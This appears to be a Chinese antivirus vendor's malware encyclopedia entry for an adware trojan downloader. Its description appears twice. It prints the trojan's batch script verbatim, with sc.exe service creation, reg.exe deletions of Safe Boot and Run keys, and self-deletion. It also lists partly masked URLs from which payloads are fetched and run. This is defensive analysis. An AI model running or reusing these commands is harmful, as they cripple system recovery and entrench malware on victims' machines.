金山毒霸2009
金山清理专家
专杀工具
在线杀毒
密保
网盾
系统急救箱
ARP防火墙
病毒名:Win32.HackTool.DownLoader.d.61440
本病毒所有命名:
影响系统:
Win9x,WinMe,Linux
简介:
1. 修改自身属性为只读隐藏 系统。 2. 将病毒母体拷贝到%windir%下和%windir%system32下,,并命名随机名称A 和随机名B 。
行为分析:
这是一个广告木马程序。它自带有一个网址库,会引导用户的IE浏览器自动登录这些网址,帮它们刷流量。同时它还能破坏系统的安全模式,阻止用户查杀它。
:
影响系统:
Win9x,WinMe,Linux
简介:
1. 修改自身属性为只读隐藏 系统。 2. 将病毒母体拷贝到%windir%下和%windir%system32下,,并命名随机名称A 和随机名B 。
行为分析:
这是一个广告木马程序。它自带有一个网址库,会引导用户的IE浏览器自动登录这些网址,帮它们刷流量。同时它还能破坏系统的安全模式,阻止用户查杀它。
描述:
1. 修改自身属性为只读隐藏 系统。
2. 将病毒母体拷贝到%windir%下和%windir%system32下,,并命名随机名称A 和随机名B 。
3. 获取系统分区的驱动器所在分区的前3个字符,连接Documents and SettingsAll Users「开始」菜单程序启动,创建一随机名C的快捷方式,指向%windir%下的病毒母体,并创建一随机名C的批处理文件,里面写入:
REM OL0ZEIU0W6QXEXO0177NSU19VCPCQXAOGWS1LB0S1YSW2JBL
NJ7XT
sc.exe create 5QINP2MGCV BinPath= "C:WINDOWS5QINP2MGCV.exe -7ZK55JU0JJG6" type= own type= interact start= auto DisplayName= NPWPS9U3
sc.exe description 5QINP2MGCV 用以管理H8Q4J54ZGH8R69H
reg.exe delete HKLMSYSTEMControlSet001ControlSafeBootMinimal{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLMSYSTEMControlSet001Control SafeBootNetwork{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLMSYSTEMCurrentControlSetControlSafeBootMinimal {4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLMSYSTEMCurrentControlSet ControlSafeBootNetwork {4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLMSoftwareMicrosoftWindowsCurrentVersionRun /F sc.exe create A02AWXB66D BinPath= "C:WINDOWSsystem32 A02AWXB66D.exe -LXCU5QYM" type= own type= interact start= auto DisplayName= 5A3VBS0Bsc.exe description A02AWXB66D FFOLG8Z4YQRG6Idel %0
exit
运行该批处理,会创建2个服务来分别启动病毒在%windir%和%windir%system32下的2个备份.并删除安全模式的注册表项,最后删除批处理自己。
4. 释放自身资源到%windir%下取名为随机名称D连接上msi.exe,设置属性为隐藏 系统 只读并运行。
5. 获取当前窗口的CLASS对比是不是"Internet Explorer _TridentDlgFrame" 是发送 WM_CLOSE WM_NCDESTROY 来关闭销毁窗口,不是则找"#32770"获取标题,若发现"任务管理器" "服务器正在" "cript" "://" ":" "内存" "rror" "安" "错" 发送 WM_CLOSE WM_NCDESTROY来关闭销毁窗口,"internet explorer"例外。
6.资源释放的文件运行后,会遍历非C 盘以外的所有exe com scr文件找到后读取他的图标资源 ,保存并将自身8000字节大小的数据直接写入正常文件,破坏原来的文件。
7. 资源释放的文件运行后,会在以下列表中随机下载一个到%windir%,并解密还原成可执行文件,并运行。
http://122.xxx.9.151/kills.txt? XDW3OCUX.exe.v
http://lmok1234xing.w239.xxxxx.cn/kills.txt?t3= XDW3OCUX.exe.v
http://baiduasp.web194.xxxxx.cn/kills.txt?t4= 不能下
http://www.xxxxx.com/kills.txt?t5= IARL84Y.exe.v
8. XDW3OCUX.exe.v读取自身的141资源,并解密,
主要是解密出刷网站的地址列表的下载地址,
http://lmok1234xing.w239.xxxxx.cn/rouhostsip2008.txt
http://baiduasp.web194.xxxxx.cn/rouhostsip2008.txt
http://122.xxx.9.151/rouhostsip2008.txt
随机选择一个读取并拼接来刷流量。
1. 修改自身属性为只读隐藏 系统。
2. 将病毒母体拷贝到%windir%下和%windir%system32下,,并命名随机名称A 和随机名B 。
3. 获取系统分区的驱动器所在分区的前3个字符,连接Documents and SettingsAll Users「开始」菜单程序启动,创建一随机名C的快捷方式,指向%windir%下的病毒母体,并创建一随机名C的批处理文件,里面写入:
REM OL0ZEIU0W6QXEXO0177NSU19VCPCQXAOGWS1LB0S1YSW2JBL
NJ7XT
sc.exe create 5QINP2MGCV BinPath= "C:WINDOWS5QINP2MGCV.exe -7ZK55JU0JJG6" type= own type= interact start= auto DisplayName= NPWPS9U3
sc.exe description 5QINP2MGCV 用以管理H8Q4J54ZGH8R69H
reg.exe delete HKLMSYSTEMControlSet001ControlSafeBootMinimal{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLMSYSTEMControlSet001Control SafeBootNetwork{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLMSYSTEMCurrentControlSetControlSafeBootMinimal {4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLMSYSTEMCurrentControlSet ControlSafeBootNetwork {4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLMSoftwareMicrosoftWindowsCurrentVersionRun /F sc.exe create A02AWXB66D BinPath= "C:WINDOWSsystem32 A02AWXB66D.exe -LXCU5QYM" type= own type= interact start= auto DisplayName= 5A3VBS0Bsc.exe description A02AWXB66D FFOLG8Z4YQRG6Idel %0
exit
运行该批处理,会创建2个服务来分别启动病毒在%windir%和%windir%system32下的2个备份.并删除安全模式的注册表项,最后删除批处理自己。
4. 释放自身资源到%windir%下取名为随机名称D连接上msi.exe,设置属性为隐藏 系统 只读并运行。
5. 获取当前窗口的CLASS对比是不是"Internet Explorer _TridentDlgFrame" 是发送 WM_CLOSE WM_NCDESTROY 来关闭销毁窗口,不是则找"#32770"获取标题,若发现"任务管理器" "服务器正在" "cript" "://" ":" "内存" "rror" "安" "错" 发送 WM_CLOSE WM_NCDESTROY来关闭销毁窗口,"internet explorer"例外。
6.资源释放的文件运行后,会遍历非C 盘以外的所有exe com scr文件找到后读取他的图标资源 ,保存并将自身8000字节大小的数据直接写入正常文件,破坏原来的文件。
7. 资源释放的文件运行后,会在以下列表中随机下载一个到%windir%,并解密还原成可执行文件,并运行。
http://122.xxx.9.151/kills.txt? XDW3OCUX.exe.v
http://lmok1234xing.w239.xxxxx.cn/kills.txt?t3= XDW3OCUX.exe.v
http://baiduasp.web194.xxxxx.cn/kills.txt?t4= 不能下
http://www.xxxxx.com/kills.txt?t5= IARL84Y.exe.v
8. XDW3OCUX.exe.v读取自身的141资源,并解密,
主要是解密出刷网站的地址列表的下载地址,
http://lmok1234xing.w239.xxxxx.cn/rouhostsip2008.txt
http://baiduasp.web194.xxxxx.cn/rouhostsip2008.txt
http://122.xxx.9.151/rouhostsip2008.txt
随机选择一个读取并拼接来刷流量。
回复
评论病毒
